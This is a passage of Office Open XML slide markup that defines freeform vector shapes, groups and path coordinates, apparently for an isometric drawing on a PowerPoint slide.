                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3612"/>
                  <a:gd name="T1" fmla="*/ 609 h 968"/>
                  <a:gd name="T2" fmla="*/ 2284 w 3612"/>
                  <a:gd name="T3" fmla="*/ 0 h 968"/>
                  <a:gd name="T4" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T5" fmla="*/ 361 h 968"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3612"/>
                  <a:gd name="T7" fmla="*/ 968 h 968"/>
                  <a:gd name="T8" fmla="*/ 0 w 3612"/>
                  <a:gd name="T9" fmla="*/ 609 h 9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12"/>
                  <a:gd name="T16" fmla="*/ 0 h 968"/>
                  <a:gd name="T17" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T18" fmla="*/ 968 h 9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12" h="968">
                    <a:moveTo>
                      <a:pt x="0" y="609"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3612" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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2" name="Freeform 1768"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3031" y="559"/>
                <a:ext cx="69" cy="235"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 1526 h 1526"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 121 h 1526"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 1526"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 1406 h 1526"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 1526 h 15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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 1526"/>
                  <a:gd name="T17" fmla="*/ 452 w 452"/>
                  <a:gd name="T18" fmla="*/ 1526 h 15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2" h="1526">
                    <a:moveTo>
                      <a:pt x="0" y="1526"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="1406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152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3" name="Freeform 1769"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2961" y="559"/>
                <a:ext cx="70" cy="235"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 453"/>
                  <a:gd name="T1" fmla="*/ 0 h 1526"/>
                  <a:gd name="T2" fmla="*/ 0 w 453"/>
                  <a:gd name="T3" fmla="*/ 1406 h 1526"/>
                  <a:gd name="T4" fmla="*/ 453 w 453"/>
                  <a:gd name="T5" fmla="*/ 1526 h 1526"/>
                  <a:gd name="T6" fmla="*/ 453 w 453"/>
                  <a:gd name="T7" fmla="*/ 121 h 1526"/>
                  <a:gd name="T8" fmla="*/ 0 w 453"/>
                  <a:gd name="T9" fmla="*/ 0 h 15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3"/>
                  <a:gd name="T16" fmla="*/ 0 h 1526"/>
                  <a:gd name="T17" fmla="*/ 453 w 453"/>
                  <a:gd name="T18" fmla="*/ 1526 h 15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3" h="1526">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="1526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="121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4" name="Freeform 1770"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2961" y="541"/>
                <a:ext cx="139" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 905"/>
                  <a:gd name="T1" fmla="*/ 120 h 241"/>
                  <a:gd name="T2" fmla="*/ 453 w 905"/>
                  <a:gd name="T3" fmla="*/ 0 h 241"/>
                  <a:gd name="T4" fmla="*/ 905 w 905"/>
                  <a:gd name="T5" fmla="*/ 120 h 241"/>
                  <a:gd name="T6" fmla="*/ 453 w 905"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 905"/>
                  <a:gd name="T9" fmla="*/ 120 h 2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05"/>
                  <a:gd name="T16" fmla="*/ 0 h 241"/>
                  <a:gd name="T17" fmla="*/ 905 w 905"/>
                  <a:gd name="T18" fmla="*/ 241 h 2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05" h="241">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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5" name="Freeform 1771"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2816" y="433"/>
                <a:ext cx="139" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 905 w 905"/>
                  <a:gd name="T1" fmla="*/ 1184 h 1184"/>
                  <a:gd name="T2" fmla="*/ 0 w 905"/>
                  <a:gd name="T3" fmla="*/ 938 h 1184"/>
                  <a:gd name="T4" fmla="*/ 0 w 905"/>
                  <a:gd name="T5" fmla="*/ 0 h 1184"/>
                  <a:gd name="T6" fmla="*/ 905 w 905"/>
                  <a:gd name="T7" fmla="*/ 246 h 1184"/>
                  <a:gd name="T8" fmla="*/ 905 w 905"/>
                  <a:gd name="T9" fmla="*/ 1184 h 1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05"/>
                  <a:gd name="T16" fmla="*/ 0 h 1184"/>
                  <a:gd name="T17" fmla="*/ 905 w 905"/>
                  <a:gd name="T18" fmla="*/ 1184 h 1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05" h="1184">
                    <a:moveTo>
                      <a:pt x="905" y="1184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="938"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="118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6" name="Freeform 1772"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2955" y="397"/>
                <a:ext cx="276" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T1" fmla="*/ 0 h 1420"/>
                  <a:gd name="T2" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T3" fmla="*/ 936 h 1420"/>
                  <a:gd name="T4" fmla="*/ 0 w 1795"/>
                  <a:gd name="T5" fmla="*/ 1420 h 1420"/>
                  <a:gd name="T6" fmla="*/ 0 w 1795"/>
                  <a:gd name="T7" fmla="*/ 482 h 1420"/>
                  <a:gd name="T8" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T9" fmla="*/ 0 h 14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95"/>
                  <a:gd name="T16" fmla="*/ 0 h 1420"/>
                  <a:gd name="T17" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T18" fmla="*/ 1420 h 14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95" h="1420">
                    <a:moveTo>
                      <a:pt x="1795" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1795" y="936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1795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7" name="Freeform 1773"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2945" y="381"/>
                <a:ext cx="348" cy="106"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2267"/>
                  <a:gd name="T1" fmla="*/ 607 h 690"/>
                  <a:gd name="T2" fmla="*/ 2267 w 2267"/>
                  <a:gd name="T3" fmla="*/ 0 h 690"/>
                  <a:gd name="T4" fmla="*/ 2267 w 2267"/>
                  <a:gd name="T5" fmla="*/ 76 h 690"/>
                  <a:gd name="T6" fmla="*/ 0 w 2267"/>
                  <a:gd name="T7" fmla="*/ 690 h 690"/>
                  <a:gd name="T8" fmla="*/ 0 w 2267"/>
                  <a:gd name="T9" fmla="*/ 607 h 6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67"/>
                  <a:gd name="T16" fmla="*/ 0 h 690"/>
                  <a:gd name="T17" fmla="*/ 2267 w 2267"/>
                  <a:gd name="T18" fmla="*/ 690 h 6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67" h="690">
                    <a:moveTo>
                      <a:pt x="0" y="607"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2267" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2267" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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8" name="Freeform 1774"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2738" y="419"/>
                <a:ext cx="207" cy="68"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T1" fmla="*/ 359 h 442"/>
                  <a:gd name="T2" fmla="*/ 0 w 1345"/>
                  <a:gd name="T3" fmla="*/ 0 h 442"/>
                  <a:gd name="T4" fmla="*/ 3 w 1345"/>
                  <a:gd name="T5" fmla="*/ 76 h 442"/>
                  <a:gd name="T6" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T7" fmla="*/ 442 h 442"/>
                  <a:gd name="T8" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T9" fmla="*/ 359 h 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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 442"/>
                  <a:gd name="T17" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T18" fmla="*/ 442 h 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5" h="442">
                    <a:moveTo>
                      <a:pt x="1345" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1345" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1345" y="3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9" name="Freeform 1775"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2738" y="325"/>
                <a:ext cx="555" cy="149"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3612"/>
                  <a:gd name="T1" fmla="*/ 609 h 968"/>
                  <a:gd name="T2" fmla="*/ 2285 w 3612"/>
                  <a:gd name="T3" fmla="*/ 0 h 968"/>
                  <a:gd name="T4" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T5" fmla="*/ 361 h 968"/>
                  <a:gd name="T6" fmla="*/ 1345 w 3612"/>
                  <a:gd name="T7" fmla="*/ 968 h 968"/>
                  <a:gd name="T8" fmla="*/ 0 w 3612"/>
                  <a:gd name="T9" fmla="*/ 609 h 9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12"/>
                  <a:gd name="T16" fmla="*/ 0 h 968"/>
                  <a:gd name="T17" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T18" fmla="*/ 968 h 9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12" h="968">
                    <a:moveTo>
                      <a:pt x="0" y="609"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2285" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3612" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1345" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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90" name="Freeform 1776"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2832" y="464"/>
                <a:ext cx="106" cy="119"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 685"/>
                  <a:gd name="T1" fmla="*/ 0 h 775"/>
                  <a:gd name="T2" fmla="*/ 0 w 685"/>
                  <a:gd name="T3" fmla="*/ 591 h 775"/>
                  <a:gd name="T4" fmla="*/ 685 w 685"/>
                  <a:gd name="T5" fmla="*/ 775 h 775"/>
                  <a:gd name="T6" fmla="*/ 685 w 685"/>
                  <a:gd name="T7" fmla="*/ 185 h 775"/>
                  <a:gd name="T8" fmla="*/ 0 w 685"/>
                  <a:gd name="T9" fmla="*/ 0 h 7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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 775"/>
                  <a:gd name="T17" fmla="*/ 685 w 685"/>
                  <a:gd name="T18" fmla="*/ 775 h 77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5" h="775">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="775"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1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91" name="Freeform 1777"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2842" y="475"/>
                <a:ext cx="86" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 562"/>
                  <a:gd name="T1" fmla="*/ 0 h 633"/>
                  <a:gd name="T2" fmla="*/ 0 w 562"/>
                  <a:gd name="T3" fmla="*/ 482 h 633"/>
                  <a:gd name="T4" fmla="*/ 562 w 562"/>
                  <a:gd name="T5" fmla="*/ 633 h 633"/>
                  <a:gd name="T6" fmla="*/ 562 w 562"/>
                  <a:gd name="T7" fmla="*/ 152 h 633"/>
                  <a:gd name="T8" fmla="*/ 0 w 562"/>
                  <a:gd name="T9" fmla="*/ 0 h 6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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 633"/>
                  <a:gd name="T17" fmla="*/ 562 w 562"/>
                  <a:gd name="T18" fmla="*/ 633 h 6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2" h="633">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="152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492" name="Group 1778"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2988" y="431"/>
                <a:ext cx="207" cy="152"/>
                <a:chOff x="2988" y="431"/>
                <a:chExt cx="207" cy="152"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="559" name="Freeform 1779"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2988" y="431"/>
                  <a:ext cx="207" cy="152"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1354"/>
                    <a:gd name="T1" fmla="*/ 990 h 990"/>
                    <a:gd name="T2" fmla="*/ 0 w 1354"/>
                    <a:gd name="T3" fmla="*/ 364 h 990"/>
                    <a:gd name="T4" fmla="*/ 711 w 1354"/>
                    <a:gd name="T5" fmla="*/ 175 h 990"/>
                    <a:gd name="T6" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T7" fmla="*/ 0 h 990"/>
                    <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T9" fmla="*/ 626 h 990"/>
                    <a:gd name="T10" fmla="*/ 711 w 1354"/>
                    <a:gd name="T11" fmla="*/ 796 h 990"/>
                    <a:gd name="T12" fmla="*/ 0 w 1354"/>
                    <a:gd name="T13" fmla="*/ 990 h 99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54"/>
                    <a:gd name="T22" fmla="*/ 0 h 990"/>
                    <a:gd name="T23" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T24" fmla="*/ 990 h 99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54" h="990">
                      <a:moveTo>
                        <a:pt x="0" y="990"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="626"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99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 1780"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3000" y="471"/>
                  <a:ext cx="86" cy="98"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 560 w 560"/>
                    <a:gd name="T1" fmla="*/ 0 h 636"/>
                    <a:gd name="T2" fmla="*/ 560 w 560"/>
                    <a:gd name="T3" fmla="*/ 485 h 636"/>
                    <a:gd name="T4" fmla="*/ 0 w 560"/>
                    <a:gd name="T5" fmla="*/ 636 h 636"/>
                    <a:gd name="T6" fmla="*/ 0 w 560"/>
                    <a:gd name="T7" fmla="*/ 152 h 636"/>
                    <a:gd name="T8" fmla="*/ 560 w 560"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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0"/>
                    <a:gd name="T16" fmla="*/ 0 h 636"/>
                    <a:gd name="T17" fmla="*/ 560 w 560"/>
                    <a:gd name="T18" fmla="*/ 636 h 6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0" h="636">
                      <a:moveTo>
                        <a:pt x="560" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="560" y="485"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="636"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56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Freeform 1781"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3100" y="445"/>
                  <a:ext cx="86" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 562 w 562"/>
                    <a:gd name="T1" fmla="*/ 0 h 633"/>
                    <a:gd name="T2" fmla="*/ 562 w 562"/>
                    <a:gd name="T3" fmla="*/ 482 h 633"/>
                    <a:gd name="T4" fmla="*/ 0 w 562"/>
                    <a:gd name="T5" fmla="*/ 633 h 633"/>
                    <a:gd name="T6" fmla="*/ 0 w 562"/>
                    <a:gd name="T7" fmla="*/ 151 h 633"/>
                    <a:gd name="T8" fmla="*/ 562 w 562"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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2"/>
                    <a:gd name="T16" fmla="*/ 0 h 633"/>
                    <a:gd name="T17" fmla="*/ 562 w 562"/>
                    <a:gd name="T18" fmla="*/ 633 h 63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2" h="633">
                      <a:moveTo>
                        <a:pt x="562" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="562" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="633"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56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3" name="Group 1782"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2961" y="223"/>
                <a:ext cx="106" cy="174"/>
                <a:chOff x="2961" y="223"/>
                <a:chExt cx="106" cy="174"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="551" name="Oval 1783"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2984" y="382"/>
                  <a:ext cx="58" cy="15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 algn="ctr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 1784"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3003" y="238"/>
                  <a:ext cx="20" cy="154"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 57"/>
                    <a:gd name="T1" fmla="*/ 0 h 425"/>
                    <a:gd name="T2" fmla="*/ 0 w 57"/>
                    <a:gd name="T3" fmla="*/ 418 h 425"/>
                    <a:gd name="T4" fmla="*/ 28 w 57"/>
                    <a:gd name="T5" fmla="*/ 425 h 425"/>
                    <a:gd name="T6" fmla="*/ 57 w 57"/>
                    <a:gd name="T7" fmla="*/ 418 h 425"/>
                    <a:gd name="T8" fmla="*/ 57 w 57"/>
                    <a:gd name="T9" fmla="*/ 0 h 425"/>
                    <a:gd name="T10" fmla="*/ 0 w 57"/>
                    <a:gd name="T11" fmla="*/ 0 h 42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7"/>
                    <a:gd name="T19" fmla="*/ 0 h 425"/>
                    <a:gd name="T20" fmla="*/ 57 w 57"/>
                    <a:gd name="T21" fmla="*/ 425 h 42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7" h="425">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="418"/>
                        <a:pt x="0" y="418"/>
                        <a:pt x="0" y="418"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="422"/>
                        <a:pt x="13" y="425"/>
                        <a:pt x="28" y="425"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="425"/>
                        <a:pt x="57" y="422"/>
                        <a:pt x="57" y="418"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="0"/>
                        <a:pt x="57" y="0"/>
                        <a:pt x="57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553" name="Group 1785"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2961" y="223"/>
                  <a:ext cx="106" cy="39"/>
                  <a:chOff x="2968" y="233"/>
                  <a:chExt cx="106" cy="39"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="554" name="Freeform 1786"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2968" y="241"/>
                    <a:ext cx="74" cy="31"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 485"/>
                      <a:gd name="T1" fmla="*/ 0 h 201"/>
                      <a:gd name="T2" fmla="*/ 0 w 485"/>
                      <a:gd name="T3" fmla="*/ 71 h 201"/>
                      <a:gd name="T4" fmla="*/ 485 w 485"/>
                      <a:gd name="T5" fmla="*/ 201 h 201"/>
                      <a:gd name="T6" fmla="*/ 485 w 485"/>
                      <a:gd name="T7" fmla="*/ 130 h 201"/>
                      <a:gd name="T8" fmla="*/ 0 w 485"/>
                      <a:gd name="T9" fmla="*/ 0 h 20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85"/>
                      <a:gd name="T16" fmla="*/ 0 h 201"/>
                      <a:gd name="T17" fmla="*/ 485 w 485"/>
                      <a:gd name="T18" fmla="*/ 201 h 20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85" h="201">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="71"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="485" y="201"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="485" y="13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5" name="Freeform 1787"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3063" y="258"/>
                    <a:ext cx="11" cy="14"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 68"/>
                      <a:gd name="T1" fmla="*/ 90 h 90"/>
                      <a:gd name="T2" fmla="*/ 0 w 68"/>
                      <a:gd name="T3" fmla="*/ 19 h 90"/>
                      <a:gd name="T4" fmla="*/ 68 w 68"/>
                      <a:gd name="T5" fmla="*/ 0 h 90"/>
                      <a:gd name="T6" fmla="*/ 68 w 68"/>
                      <a:gd name="T7" fmla="*/ 71 h 90"/>
                      <a:gd name="T8" fmla="*/ 0 w 68"/>
                      <a:gd name="T9" fmla="*/ 90 h 9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8"/>
                      <a:gd name="T16" fmla="*/ 0 h 90"/>
                      <a:gd name="T17" fmla="*/ 68 w 68"/>
                      <a:gd name="T18" fmla="*/ 90 h 9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8" h="90">
                        <a:moveTo>
                          <a:pt x="0" y="90"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="19"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="68" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="68" y="71"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="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6" name="Rectangle 1788"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3042" y="261"/>
                    <a:ext cx="21" cy="11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 algn="ctr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7" name="Freeform 1789"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2968" y="233"/>
                    <a:ext cx="106" cy="28"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 204 w 690"/>
                      <a:gd name="T1" fmla="*/ 0 h 184"/>
                      <a:gd name="T2" fmla="*/ 69 w 690"/>
                      <a:gd name="T3" fmla="*/ 2 h 184"/>
                      <a:gd name="T4" fmla="*/ 3 w 690"/>
                      <a:gd name="T5" fmla="*/ 21 h 184"/>
                      <a:gd name="T6" fmla="*/ 0 w 690"/>
                      <a:gd name="T7" fmla="*/ 54 h 184"/>
                      <a:gd name="T8" fmla="*/ 485 w 690"/>
                      <a:gd name="T9" fmla="*/ 184 h 184"/>
                      <a:gd name="T10" fmla="*/ 622 w 690"/>
                      <a:gd name="T11" fmla="*/ 184 h 184"/>
                      <a:gd name="T12" fmla="*/ 690 w 690"/>
                      <a:gd name="T13" fmla="*/ 165 h 184"/>
                      <a:gd name="T14" fmla="*/ 690 w 690"/>
                      <a:gd name="T15" fmla="*/ 130 h 184"/>
                      <a:gd name="T16" fmla="*/ 204 w 690"/>
                      <a:gd name="T17" fmla="*/ 0 h 18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690"/>
                      <a:gd name="T28" fmla="*/ 0 h 184"/>
                      <a:gd name="T29" fmla="*/ 690 w 690"/>
                      <a:gd name="T30" fmla="*/ 184 h 184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690" h="184">
                        <a:moveTo>
                          <a:pt x="204" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="69" y="2"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="21"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="54"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="485" y="184"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="622" y="184"/>
                        </a:lnTo>
